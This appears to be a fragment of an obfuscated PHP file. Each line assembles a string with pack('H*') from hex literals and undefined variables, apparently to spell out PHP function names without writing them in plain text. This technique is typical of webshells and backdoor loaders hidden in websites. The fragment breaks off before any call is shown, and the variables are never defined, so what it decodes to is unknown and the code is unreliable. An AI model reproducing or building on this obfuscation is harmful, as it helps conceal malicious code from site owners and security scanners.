<?php 
 
$reset6 = pack("H*", $variable1 . $variable3 . '72' . '65' . $variable13 . $variable4 . '5f' . $variable14 . '65' . $variable3 . $variable15 . '63' . '6f' . $variable12 . '74' . $variable5 . '6e' . $variable3 . $variable1);
$reset7 = pack("H*", '70' . $variable8 . $variable6 . $variable16 . $variable1 . $variable5);





